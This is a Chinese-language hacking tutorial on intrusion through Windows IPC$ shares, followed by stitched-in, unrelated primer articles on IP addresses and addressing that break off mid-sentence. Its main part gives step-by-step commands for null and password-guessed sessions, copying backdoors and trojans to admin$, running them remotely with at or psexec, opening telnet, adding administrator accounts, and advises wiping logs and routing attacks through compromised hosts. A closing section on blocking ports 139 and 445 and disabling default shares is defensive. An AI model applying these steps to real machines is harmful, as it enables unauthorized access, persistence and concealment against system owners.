1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放（LISTENING）；
2 如果禁止NBT，那么只有445端口开放。

我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见，如果远程服务器没有监听139或445端口，ipc$会话是无法建立的。

六 ipc管道在hack攻击中的意义
ipc管道本来是微软为了方便管理员进行远程管理而设计的，但在入侵者看来，开放ipc管道的主机似乎更容易得手。通过ipc管道，我们可以远程调用一些系统函数（大多通过工具实现，但需要相应的权限），这往往是入侵成败的关键。如果不考虑这些，仅从传送 文件这一方面，ipc管道已经给了入侵者莫大的支持，甚至已经成为了最重要的传输手段，因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然，我们也不能忽视权限在ipc管道中扮演的重要角色，想必你一定品尝过空会 话的尴尬，没有权限，开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限，那么ipc管道这把双刃剑将显示出它狰狞的一面。

七 ipc$连接失败的常见原因
以下是一些常见的导致ipc$连接失败的原因：

1 IPC连接是Windows NT及以上系统中特有的功能，由于其需要用到Windows NT中很多DLL函数，所以不能在Windows 9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的；

2 如果想成功的建立一个ipc$连接，就需要响应方开启ipc$共享，即使是空连接也是这样，如果响应方关闭了ipc$共享，将不能建立连接；

3 连接发起方未启动Lanmanworkstation服务（显示名为：Workstation）：它提供网络链结和通讯，没有它发起方无法发起连接请求；

4 响应方未启动Lanmanserver服务（显示名为：Server）：它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它主机将无法响应发起方的连接请求，不过没有它仍可发起ipc$连接；

5 响应方未启动NetLogon，它支持网络上计算机 pass-through 帐户登录身份（不过这种情况好像不多）；

6 响应方的139，445端口未处于监听状态或被防火墙屏蔽；

7 连接发起方未打开139，445端口；

8 用户名或者密码错误：如果发生这样的错误，系统将给你类似于''无法更新密码''这样的错误提示（显然空会话排除这种错误）；

9 命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号""即可；

10 如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。

另外,你也可以根据返回的错误号分析原因：

错误号5，拒绝访问：很可能你使用的用户不是管理员权限的；
错误号51，Windows无法找到网络路径：网络有问题；
错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连；
错误号1326，未知的用户名或错误密码：原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动；
错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。

八 复制文件失败的原因
有些朋友虽然成功的建立了ipc$连接，但在copy时却遇到了这样那样的麻烦，无法复制成功，那么导致复制失败的常见原因又有哪些呢？

1 对方未开启共享文件夹
这类错误出现的最多，占到50%以上。许多朋友在ipc$连接建立成功后，甚至都不知道对方是否有共享文件夹，就进行盲目复制，结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下你想要复制的共享文件夹是否存在（用软件查看当然更好），不要认为能建立ipc$连接就一定有共享文件夹存在。

2 向默认共享复制失败
这类错误也是大家经常犯的，主要有两个小方面：

1）错误的认为能建立ipc$连接的主机就一定开启了默认共享，因而在建立完连接之后马上向c$,d$,admin$之类的默认共享复制文件，一旦对方未开启默认共享，将导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享，并不能说明默认共享 一定存在。ipc$共享与默认共享是两码事，ipc$共享是一个命名管道，并不是哪个实际的文件夹，而默认共享却是实实在在的共享文件夹；

2）由于net view \\IP 这个命令无法显示默认共享文件夹（因为默认共享带$），因此通过这个命令，我们并不能判断对方是否开启了默认共享，因此如果对方未开启默认共享，那么所有向默认共享进行的#作都不能成功；（不过大部分扫描软件在扫弱口令的同时，都能扫到默认共享目录，可以 避免此类错误的发生）

要点：请大家一定区分ipc共享，默认共享，普通共享这三者的区别：ipc共享是一个管道，并不是实际的共享文件夹；默认共享是安装时默认打开的文件夹；普通共享是我们自己开启的可以设置权限的共享文件夹。

3用户权限不够，包括四种情形：
1）空连接向所有共享（默认共享和普通共享）复制时，权限是不够的；
2）向默认共享复制时，在Win2000 Pro版中，只有Administrators和Backup Operators组成员才可以，在Win2000 Server版本 Server Operatros组也可以访问到这些共享目录；
3）向普通共享复制时，要具有相应权限（即对方管理员事先设定的访问权限）；
4）对方可以通过防火墙或安全软件的设置，禁止外部访问共享；

注意：
1 不要认为administrator就一定具有管理员权限，管理员名称是可以改的
2 管理员可以访问默认共享的文件夹，但不一定能够访问普通的共享文件夹，因为管理员可以对普通的共享文件夹进行访问权限设置，如图6，管理员为D盘设置的访问权限为仅允许名为xinxin的用户对该文件夹进行完全访问，那么此时即使你拥有管理员权限，你仍然 不能访问D盘。不过有意思的是，如果此时对方又开启了D$的默认共享，那么你却可以访问D$，从而绕过了权限限制，有兴趣的朋友可以自己做测试。

4被防火墙杀死或在局域网
还有一种情况，那就是也许你的复制#作已经成功，但当远程运行时，被防火墙杀掉了，导致找不到文件；或者你把木马复制到了局域网内的主机，导致连接失败（反向连接的木马不会发生这种情况）。如果你没有想到这种情况，你会以为是复制上出了问题，但实际你的复 制#作已经成功了，只是运行时出了问题。

呵呵，大家也知道，ipc$连接在实际#作过程中会出现各种各样的问题，上面我所总结的只是一些常见错误，没说到的，大家可以给我提个醒儿。

九 关于at命令和xp对ipc$的限制
本来还想说一下用at远程运行程序失败的原因，但考虑到at的成功率不是很高，问题也很多，在这里就不提它了（提的越多，用的人就越多），而是推荐大家用p***ec.exe远程运行程序，假设想要远程机器执行本地c:\xinxin.exe文件，且管理 员为administrator，密码为1234，那么输入下面的命令：
p***ec \\ip -u administrator -p 1234 -c c:\xinxin.exe
如果已经建立ipc连接，则-u -p这两个参数不需要，p***ec.exe将自动拷贝文件到远程机器并运行。

本来xp中的ipc$也不想在这里讨论，想单独拿出来讨论，但看到越来越多的朋友很急切的提问为什么遇到xp的时候，大部分#作都很难成功。我在这里就简单提一下吧，在xp的默认安全选项中，任何远程访问仅被赋予来宾权限，也就是说即使你是用管理员帐户和 密码，你所得到的权限也只是Guest，因此大部分#作都会因为权限不够而失败，而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了xp的管理员密码，我建议你尽量避开ipc管道。

十 如何打开目标的IPC$共享以及其他共享
目标的ipc$不是轻易就能打开的，否则就要天下打乱了。你需要一个admin权限的shell，比如telnet，木马，cmd重定向等，然后在shell下执行：
net share ipc$
开放目标的ipc$共享；
net share ipc$ /del
关闭目标的ipc$共享；如果你要给它开共享文件夹，你可以用：
net share xinxin=c:\
这样就把它的c盘开为共享名为xinxin共享文件夹了。（可是我发现很多人错误的认为开共享文件夹的命令是net share c$，还大模大样的给菜鸟指指点点，真是误人子弟了）。再次声明，这些#作都是在shell下才能实现的。

十一 一些需要shell才能完成的命令
看到很多教程这方面写的十分不准确，一些需要shell才能完成命令就简简单单的在ipc$连接下执行了，起了误导作用。那么下面我总结一下需要在shell才能完成的命令：

1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的#作需要在shell下完成；

2 打开远程主机的ipc$共享，默认共享，普通共享的#作需要在shell下完成；

3 运行/关闭远程主机的服务，需要在shell下完成；

4 启动/杀掉远程主机的进程，也需要在shell下完成（用软件的情况下除外，如pskill）。

十二 入侵中可能会用到的命令
为了这份教程的完整性，我列出了ipc$入侵中的一些常用命令，如果你已经掌握了这些命令，你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程，如果只适用于本地，你只能在获得远程主机的shell（如cmd，telnet等）后，才能 向远程主机执行。

1 建立/删除ipc$连接的命令

1）建立空连接:
net use \\127.0.0.1\ipc$ "" /user:""

2）建立非空连接:
net use \\127.0.0.1\ipc$ "密码" /user:"用户名"

3）删除连接:
net use \\127.0.0.1\ipc$ /del

2 在ipc$连接中对远程主机的#作命令

1） 查看远程主机的共享资源（看不到默认共享）:
net view \\127.0.0.1

2） 查看远程主机的当前时间:
net time \\127.0.0.1

3） 得到远程主机的netbios用户名列表:
nbtstat -A 127.0.0.1

4）映射/删除远程共享:
net use z: \\127.0.0.1\c
此命令将共享名为c的共享资源映射为本地z盘

net use z: /del
删除映射的z盘，其他盘类推

5）向远程主机复制文件:
copy 路径\文件名 \\IP\共享目录名，如：
copy c:\xinxin.exe \\127.0.0.1\c$ 即将c盘下的xinxin.exe复制到对方c盘内
当然，你也可以把远程主机上的文件复制到自己的机器里：
copy \\127.0.0.1\c$\xinxin.exe c:\

6）远程添加计划任务:
at \\IP 时间 程序名 如：
at \\127.0.0.0 11:00 xinxin.exe
注意：时间尽量使用24小时制；如果你打算运行的程序在系统默认搜索路径（比如system32/）下则不用加路径，否则必须加全路径

3 本地命令

1）查看本地主机的共享资源（可以看到本地的默认共享）
net share

2）得到本地主机的用户列表
net user

3）显示本地某用户的帐户信息
net user 帐户名

4）显示本地主机当前启动的服务
net start

5）启动/关闭本地服务
net start 服务名
net stop 服务名

6）在本地添加帐户
net user 帐户名 密码 /add

7）激活禁用的用户
net uesr 帐户名 /active:yes

8）加入管理员组
net localgroup administrators 帐户名 /add

很显然的是，虽然这些都是本地命令，但如果你在远程主机的shell中输入，比如你telnet成功后输入上面这些命令，那么这些本地输入将作用在远程主机上。

4 其他一些命令
1）telnet
telnet IP 端口
telnet 127.0.0.0 23

2）用opentelnet.exe开启远程主机的telnet
OpenTelnet.exe \\ip 管理员帐号 密码 NTLM的认证方式 port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求：
1）目标开启了ipc$共享
2）你要拥有管理员密码和帐号
3）目标开启RemoteRegistry服务，用户就可以更改ntlm认证
4）对仅WIN2K/XP有效

3）用p***ec.exe一步获得shell，需要ipc管道支持
p***ec.exe \\IP -u 管理员帐号 -p 密码 cmd
p***ec.exe \\127.0.0.1 -u administrator -p "" cmd

十三 对比过去和现今的ipc$入侵
既然是对比，那么我就先把过去的ipc$入侵步骤写给大家，都是蛮经典的步骤：

[1]
C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators
\\用扫到的空口令建立连接

[2]
c:\>net view \\127.0.0.1
\\查看远程的共享资源

[3]
C:\>copy srv.exe \\127.0.0.1\admin$\system32
\\将一次性后门srv.exe复制到对方的系统文件夹下，前提是admin$开启

[4]
C:\>net time \\127.0.0.1
\\查看远程主机的当前时间

[5]
C:\>at \\127.0.0.1 时间 srv.exe
\\用at命令远程运行srv.exe，需要对方开启了''Task Scheduler''服务

[6]
C:\>net time \\127.0.0.1
\\再次查看当前时间来估算srv.exe是否已经运行，此步可以省略

[7]
C:\>telnet 127.0.0.1 99
\\开一个新窗口，用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么意思？那你就把它想象成远程机器的控制权就好了，#作像DOS)，99端口是srv.exe开的一次性后门的端口

[8]
C:\WINNT\system32>net start telnet
\\我们在刚刚登陆上的shell中启动远程机器的telnet服务，毕竟srv.exe是一次性的后门，我们需要一个长久的后门便于以后访问，如果对方的telnet已经启动，此步可省略

[9]
C:\>copy ntlm.exe \\127.0.0.1\admin$\system32
\\在原来那个窗口中将ntlm.exe传过去，ntlm.exe是用来更改telnet身份验证的

[10]
C:\WINNT\system32>ntlm.exe
\\在shell窗口中运行ntlm.exe，以后你就可以畅通无阻的telnet这台主机了

[11]
C:\>telnet 127.0.0.1 23
\\在新窗口中telnet到127.0.0.1，端口23可省略，这样我们又获得一个长期的后门

[12]
C:\WINNT\system32>net user 帐户名 密码 /add
C:\WINNT\system32>net uesr guest /active:yes
C:\WINNT\system32>net localgroup administrators 帐户名 /add
\\telnet上以后，你可以建立新帐户，激活guest，把任何帐户加入管理员组等

好了，写到这里我似乎回到了2，3年前，那时的ipc$大家都是这么用的，不过随着新工具的出现，上面提到的一些工具和命令现在已经不常用到了，那就让我们看看现在的高效而简单的ipc$入侵吧。

[1]
p***ec.exe \\IP -u 管理员帐号 -p 密码 cmd
\\用这个工具我们可以一步到位的获得shell

OpenTelnet.exe \\server 管理员帐号 密码 NTLM的认证方式 port
\\用它可以方便的更改telnet的验证方式和端口，方便我们登陆

[2]
已经没有第二步了，用一步获得shell之后，你做什么都可以了，安后门可以用winshell，克隆就用ca吧，开终端用3389.vbe，记录密码用win2kpass，总之好的工具不少，随你选了，我就不多说了。

十四 如何防范ipc$入侵察看本地共享资源
运行-cmd-输入net share
删除共享(每次输入一个）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）

1 禁止空连接进行枚举(此#作并不能阻止空连接的建立)

运行regedit，找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：1
如果设置为"1"，一个匿名用户仍然可以连接到IPC$共享，但无法通过这种连接得到列举SAM帐号和共享信息的权限；在Windows 2000 中增加了"2"，未取得匿名权的用户将不能进行ipc$空连接。建议设置为1。如果上面所说的主键不存在，就新建一个再改键值。如果你觉得改注册表麻烦，可以在本地安全设置中设置此项： 在本地安全设置－本地策略－安全选项－''对匿名连接的额外限制''

2 禁止默认共享

1）察看本地共享资源
运行-cmd-输入net share

2）删除共享（重起后默认共享仍然存在）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）

3）停止server服务
net stop server /y （重新启动后server服务会重新开启）

4）禁止自动打开默认共享（此#作并不能关闭ipc$共享）
运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。
这两个键值在默认情况下在主机上是不存在的，需要自己手动添加，修改后重起机器使设置生效。

3 关闭ipc$和默认共享依赖的服务:server服务
如果你真的想关闭ipc$共享，那就禁止server服务吧：
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-选已禁用，这时可能会有提示说：XXX服务也会关闭是否继续，因为还有些次要的服务要依赖于server服务，不要管它。

4 屏蔽139，445端口
由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。

1）139端口可以通过禁止NBT来屏蔽
本地连接－TCP/IT属性－高级－WINS－选‘禁用TCP/IT上的NETBIOS’一项

2）445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
value: 0
修改完后重启机器
注意：如果屏蔽掉了以上两个端口，你将无法用ipc$入侵别人。

3）安装防火墙进行端口过滤

6 设置复杂密码，防止通过ipc$穷举出密码，我觉得这才是最好的办法，增强安全意识，比不停的打补丁要安全的多。

十五 ipc$入侵问答精选
1.进行ipc$入侵的时候，会在服务器中留下记录，有什么办法可以不让服务器发现吗？

答：留下记录是一定的，你走后用清除日志程序删除就可以了，或者用肉鸡入侵。

2.你看下面的情况是为什么，可以连接但不能复制
net use \\***.***.***.***\ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe \\***.***.***.***\admin$
找不到网络路径
命令不成功

答：像“找不到网络路径”“找不到网络名”之类的问题，大多是因为你想要复制到的共享文件夹没有开启，所以在复制的时候会出现错误，你可以试着找找其他的共享文件夹。

3.如果对方开了IPC$，且能建立空联接，但打开C、D盘时，都要求密码，我知道是空连接没有太多的权限，但没别的办法了吗？

答：建议先用流光或者别的什么扫描软件试着猜解一下密码，如果猜不出来，只能放弃，毕竟空连接的能力有限。

4.我已经猜解到了管理员的密码，且已经ipc$连接成功了，但net view \\ip发现它没开默认共享，我该怎么办？

答：首先纠正你的一个错误，用net view \\ip是无法看到默认共享的，你可以试着将文件复制到c$，d$看看，如果都不行，说明他关闭了默认共享，那你就用opentelnet.exe或p***ec.exe吧，用法上面有。

5.ipc$连接成功后，我用下面的命令建立了一个帐户，却发现这个帐户在我自己的机器上，这是怎么回事？
net uset ccbirds /add

答：ipc$建立成功只能说明你与远程主机建立了通信隧道，并不意味你取得了一个shell，只有在获得一个shell（比如telnet）之后，你才能在远程机器建立一个帐户，否则你的#作只是在本地进行。

6.我已进入了一台肉机，用的管理员帐号，可以看他的系统时间，但是复制程序到他的机子上却不行，每次都提示“拒绝访问，已复制0个文件”，是不是对方有什么服务没开，我该怎么办？

答：一般来说“拒绝访问”都是权限不够的结果，可能是你用的帐户有问题，还有一种可能，如果你想向普通共享文件夹复制文件却返回这个错误，说明这个文件夹设置的允许访问用户中不包括你（哪怕你是管理员），这一点我在上一期文章中分析了。

7.我用Win98能与对方建立ipc$连接吗？

答：理论上不可以，要进行ipc$的#作，建议用win2000，用其他#作系统会带来许多不必要的麻烦。

8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话，但用nbtstat -A IP 却无法导出用户列表，这是为什么？

答：空会话在默认的情况下是可以导出用户列表的，但如果管理员通过修改注册表来禁止导出列表，就会出现你所说的情况；还有可能是你自己的NBT没有打开，netstat命令是建立在NBT之上的。

9.我建立ipc$连接的时候返回如下信息：‘提供的凭据与已存在的凭据集冲突’，怎么回事？

答：呵呵，这说明你已经与目标主机建立了ipc$连接，两个主机间同时建立两个ipc$连接是不允许的。

10.我在映射的时候出现：
F:\>net use h: \\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事？

答：你也太粗心了吧，这说明你有一个h盘了，映射到没有的盘符吧！

11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" 成功了，但当我映射时出现了错误，向我要密码，怎么回事？
F:\>net use h: \\*.*.*.*\c$
密码在 \\*.*.*.*\c$ 无效。
请键入 \\*.*.*.*\c$ 的密码:
系统发生 5 错误。
拒绝访问。

答：呵呵，向你要密码说明你当前使用的用户权限不够，不能映射C$这个默认共享，想办法提升权限或者找管理员的弱口令吧！默认共享一般是需要管理员权限的。

12.我用superscan扫到了一个开了139端口的主机，但为什么不能空连接呢？

答：你混淆了ipc$与139的关系，能进行ipc$连接的主机一定开了139或445端口，但开这两个端口的主机可不一定能空连接，因为对方可以关闭ipc$共享.

13.我门局域网里的机器大多都是xp，我用流光扫描到几个administrator帐号口令是空，而且可以连接，但不能复制东西，说错误5。请问为什么？

答：xp的安全性要高一些，在安全策略的默认设置中，对本地帐户的网络登录进行身份验证的时候，默认为来宾权限，即使你用管理员远程登录，也只具有来宾权限，因此你复制文件，当然是错误5：权限不够。

14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功，可是 net use i: \\192.168.0.2\c
出现请键入 \\192.168.0.2 的密码，怎么回事情呢？我用的可是管理员呀？应该什么都可以访问呀？

答：虽然你具有管理员权限，但管理员在设置c盘共享权限时（注意：普通共享可以设置访问权限，而默认共享则不能）可能并未设置允许administrator访问，所以会出现上述问题。

15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器？如果禁止server服务呢？

答：禁止以上两项仍可以发起ipc$连接，不过这种问题自己动手试验会更好。

16.能告诉我下面的两个错误产生的原因吗？
c:\>net time \\61.225.*.*
系统发生 5 错误。
拒绝访问。

c:\>net view \\61.225.*.*
系统发生 5 错误。
拒绝访问。

答：起初遇到这个问题的时候我也很纳闷，错误5表示权限不够，可是连空会话的权限都可以完成上面的两个命令，他为什么不行呢？难道是他没建立连接？后来那个粗心的同志告诉我的确是这样，他忘记了自己已经删了ipc$连接，之后他又输入了上面那两个命令，随 之发生了错误5。

17.您看看这是怎么回事？
F:\>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。

答：答案很简单，你的命令错了，应该是net time \\ip
没输入ip地址，当然找不到服务器。view的命令也应该有ip地址，即：net view \\ip


IP地址常识

《一键清理系统垃圾》

IP地址常识

谈到因特网，IP地址就不能不提，因为无论是从学习还是使用因特网的角度来看，IP地址都是一个十分重要的概念，INTERNET的许多服务和特点都是通过IP地址体现出来的。
    一、IP地址的概念
    我们知道因特网是全世界范围内的计算机联为一体而构成的通信网络的总称。联在某个网络上的两台计算机之间在相互通信时，在它们所传送的数据包里都会含有某些附加信息，这些附加信息就是发送数据的计算机的地址和接受数据的计算机的地址。象这样，人们为了通信的方便给每一台计算机都事先分配一个类似我们日常生活中的电话号码一样的标识地址，该标识地址就是我们今天所要介绍的IP地址。根据TCP/IP协议规定，IP地址是由32位二进制数组成，而且在INTERNET范围内是唯一的。例如，某台联在因特网上的计算机的IP地址为：
        11010010 01001001 10001100 00000010
    很明显，这些数字对于人来说不太好记忆。人们为了方便记忆，就将组成计算机的IP地址的32位二进制分成四段，每段8位，中间用小数点隔开，然后将每八位二进制转换成十进制数，这样上述计算机的IP地址就变成了：210.73.140.2。
    二、IP地址的分类
    我们说过因特网是把全世界的无数个网络连接起来的一个庞大的网间网，每个网络中的计算机通过其自身的IP地址而被唯一标识的，据此我们也可以设想，在INTERNET上这个庞大的网间网中，每个网络也有自己的标识符。这与我们日常生活中的电话号码很相像，例如有一个电话号码为0515163，这个号码中的前四位表示该电话是属于哪个地区的，后面的数字表示该地区的某个电话号码。与上面的例子类似，我们把计算机的IP地址也分成两部分，分别为网络标识和主机标识。同一个物理网络上的所有主机都用同一个网络标识，IP地址的4个字节划分为2个部分，一部分用以标明具体的网络段，即网络标识；另一部分用以标明具体的节点，即主机标识，也就是说某个网络中的特定的计算机号码。例如，盐城市信息网络中心的服务器的IP地址为210.73.140.2，对于该IP地址，我们可以把它分成网络标识和主机标识两部分，这样上述的IP地址就可以写成：
          网络标识：210.73.140.0
          主机标识：　　　　 2
          合起来写：210.73.140.2
    由于网络中包含的计算机有可能不一样多，有的网络可能含有较多的计算机，也有的网络包含较少的计算机，于是人们按照网络规模的大小，把32位地址信息设成三种定位的划分方式，这三种划分方法分别对应于A类、B类、C类IP地址。
    1．A类IP地址
    一个A类IP地址是指，在IP地址的四段号码中，第一段号码为网络号码，剩下的三段号码为本地计算机的号码。如果用二进制表示IP地址的话，A类IP地址就由1字节的网络地址和3字节主机地址组成，网络地址的最高位必须是“0”。A类IP地址中网络的标识长度为7位，主机标识的长度为24位，A类网络地址数量较少，可以用于主机数达1600多万台的大型网络。
    2．B类IP地址
    一个B类IP地址是指，在IP地址的四段号码中，前两段号码为网络号码，剩下的两段号码为本地计算机的号码。如果用二进制表示IP地址的话，B类IP地址就由2字节的网络地址和2字节主机地址组成，网络地址的最高位必须是“10”。B类IP地址中网络的标识长度为14位，主机标识的长度为16位，B类网络地址适用于中等规模规模的网络，每个网络所能容纳的计算机数为6万多台。
    3．C类IP地址
    一个C类IP地址是指，在IP地址的四段号码中，前三段号码为网络号码，剩下的一段号码为本地计算机的号码。如果用二进制表示IP地址的话，C类IP地址就由3字节的网络地址和1字节主机地址组成，网络地址的最高位必须是“110”。C类IP地址中网络的标识长度为21位，主机标识的长度为8位，C类网络地址数量较多，适用于小规模的局域网络，每个网络最多只能包含254台计算机。
    除了上面三种类型的IP地址外，还有几种特殊类型的IP地址，TCP/IP协议规定，凡IP地址中的第一个字节以“lll0”开始的地址都叫多点广播地址。因此，任何第一个字节大于223小于240的IP地址是多点广播地址；IP地址中的每一个字节都为0的地址（“0.0.0.0”）对应于当前主机；IP地址中的每一个字节都为1的IP地址（“255．255．255．255”）是当前子网的广播地址；IP地址中凡是以“llll0”的地址都留着将来作为特殊用途使用。
    三、IP的寻址规则
    1.网络寻址规则
    A、 网络地址必须唯一。
    B、 网络标识不能以数字127开头。在A类地址中，数字127保留给内部回送函数。
    C、 网络标识的第一个字节不能为255。数字2５5作为广播地址。
    D、 网络标识的第一个字节不能为“0”，“0”表示该地址是本地主机，不能传送。
     2.主机寻址规则
    A、主机标识在同一网络内必须是唯一的。
    B、主机标识的各个位不能都为“1”，如果所有位都为“1”，则该机地址是广播地址，而非主机的地址。
    C、主机标识的各个位不能都为“0”，如果各个位都为“0”，则表示“只有这个网络”，而这个网络上没有任何主机。
    四、IP子网掩码概述
    1.子网掩码的概念
    子网掩码是一个32位地址，用于屏蔽IP地址的一部分以区别网络标识和主机标识，并说明该IP地址是在局域网上，还是在远程网上。
    2.确定子网掩码数
    用于子网掩码的位数决定于可能的子网数目和每个子网的主机数目。在定义子网掩码前，必须弄清楚本来使用的子网数和主机数目。
    定义子网掩码的步骤为：
    A、确定哪些组地址归我们使用。比如我们申请到的网络号为“210.73.a.b”，该网络地址为c类IP地址，网络标识为“210.73”，主机标识为“a.b”。
    B、根据我们现在所需的子网数以及将来可能扩充到的子网数，用宿主机的一些位来定义子网掩码。比如我们现在需要12个子网，将来可能需要16个。用第三个字节的前四位确定子网掩码。前四位都置为“1”，即第三个字节为“11110000”，这个数我们暂且称作新的二进制子网掩码。
    C、把对应初始网络的各个位都置为“1”，即前两个字节都置为“1”，第四个字节都置为“0”，则子网掩码的间断二进制形式为：“11111111.11111111.11110000.00000000”
    D、把这个数转化为间断十进制形式为：“255.255.240.0”
这个数为该网络的子网掩码。
3.IP掩码的标注
    A、无子网的标注法
    对无子网的IP地址，可写成主机号为0的掩码。如IP地址210.73.140.5，掩码为255.255.255.0，也可以缺省掩码，只写IP地址。
    B、有子网的标注法
    有子网时，一定要二者配对出现。以C类地址为例。
    1.IP地址中的前3个字节表示网络号，后一个字节既表明子网号，又说明主机号，还说明两个IP地址是否属于一个网段。如果属于同一网络区间，这两个地址间的信息交换就不通过路由器。如果不属同一网络区间，也就是子网号不同，两个地址的信息交换就要通过路由器进行。例如：对于IP地址为210.73.140.5的主机来说，其主机标识为00000101，对于IP地址为210.73.140.16的主机来说它的主机标识为00010000，以上两个主机标识的前面三位全是000，说明这两个IP地址在同一个网络区域中。
    主机地址，例如?10.73.60.1的主机标识为00000001，210.73.60.252的主机标识为11111100，这两个主机标识的前面三位000与011不同，说明二者在不同的网络区域，要交换信息需要通过路由器。其子网上主机号各为1和252。
    2.掩码的功用是说明有子网和有几个子网，但子网数只能表示为一个范围，不能确切讲具体几个子网，掩码不说明具体子网号，有子网的掩码格式(对C类地址):主机标识前几位为子网号，后面不写主机，全写0。
    五、IP的其他事项
    1.一般国际互联网信息中心在分配IP地址时是按照网络来分配的，因此只有说到网络地址时才能使用A类、B类、C类的说法；
    2.在分配网络地址时，网络标识是固定的，而计算机标识是可以在一定范围内变化的，下面是三类网络地址的组成形式：
        A类地址：73.0.0.0
        B类地址：160.153.0.0
        C类地址：210.73.140.0
        上述中的每个0均可以在0~255之间进行变化。
    3.因为IP地址的前三位数字已决定了一个IP地址是属于何种类型的网络，所以A类网络地址将无法再分成B类IP地址，B类IP地址也不能再分成C类IP地址。
    4.在谈到某一特定的计算机IP地址时不宜使用A类、B类、C类的说法，但可以说主机地址是属于哪一个A类、B类、C类网络了。
    通过上面的学习，大家对IP地址肯定有了了解。有了IP地址大家就可以发送电子邮件了，并且可以获得Internet网上的其他信息，例如可以获得Internet上的WWW服务、BBS服务、FTP服务等等。


IP寻址技术

《一键清理系统垃圾》

IP寻址技术

1969年仅有四节点的ARPA网在美国实验成功，有谁能想到由此演化的互联网会成为世界
最大的数据网呢。随着计算机的普及，上网人数的不断增加，越来越多的企业把目光投
向互联网。支撑Internet运转的关键是IP技术，在此详细讲解其基本概念及IP的寻址过
程。

MAC地址(位于数据链路层)

介质访问控制(Media Access Control)地址一般位于网卡中，用于标识网络设备，控制
对网络介质的访问。例如，网络设备要访问传输电缆(网线，位于物理层)，必须具备一
个MAC地址，发送的数据要到达目的地，必须知道目的地的MAC地址。因为一个网卡具有
唯一的MAC地址，所以又叫做物理地址。

网络地址(位于网络层)

因为一个网络地址可以根据逻辑分配给任意一个网络设备，所以又叫逻辑地址。网络地
址通常可分成网络号和主机号两部分，用于标识网络和该网络中的设备。采用不同网络
层协议，网络地址的描述是不同的，如IPX，以PAD.0134.02d3.es50为例，PAD为网络号
，而0134.02d3.es50是标识该网络中设备的主机号。IP协议则用32位二进制来表示网络
地址，一般就叫做IP地址。MAC地址用于网络通信，网络地址是用于确定网络设备位置
的逻辑地址。

IP地址

为了适应不同大小的网络需求，所有的IP地址被分为不同的类别―Class A、B、C，这
就是有类IP地址。可用IP地址的前三位做区分。在计算网络支持的主机数时要减2，是
因为全0的主机号用于标识该网络，全1的主机号是该网络的广播地址。广播地址用于标
识网络的所有主机，数据发向广播地址就相当于向全网络主机广播。

或者以网络掩码(netmask)作区分。网络掩码和IP一样也是32位二进制数，把网络掩码
和IP地址逻辑与得出的结果就是主机号。

有类IP地址(Class IP)的局限

网络的发展出乎设计者的想象。32位的IPv4(IP的第四版本)虽有232个IP地址，但是将
IP地址分类的方法，理想化地把网络分为千万级、万级、百级，僵化的选择导致了大量
的浪费。而随着网上站点的增加，用于维持网络间通信的路由器路由信息的不断增长，
最终将导致路由器无法负荷，只能将部分站点的路由信息丢弃，造成不能访问。

保留地址

在Internet中有部分IP地址是保留作内部网络使用的。采用保留地址，每个局域网都可
以为内部网络的众多主机分配一个IP地址。通过NAT地址转换，在访问外部网络时将保
留地址转为真实地址，能够满足内部网络采用TCP/IP协议的同时，也保持了Internet上
的地址唯一性。

如果内部网络不连入Internet的话，实际上是可以使用任何一类地址。否则必须保证连
通网络的地址唯一性。

子网化(Subnetting)

把一个网络再细分成数个小网，就叫子网化。假设一家公司有一个B类地址130.5.0.0，
可是需要为各地的分公司分别建立网络。130.5是其网络号，把主机号(16位)分成子网
号(8位)和子网主机号(8位)两部分，共有子网28-2个，这样就可以为每个分公司分配一
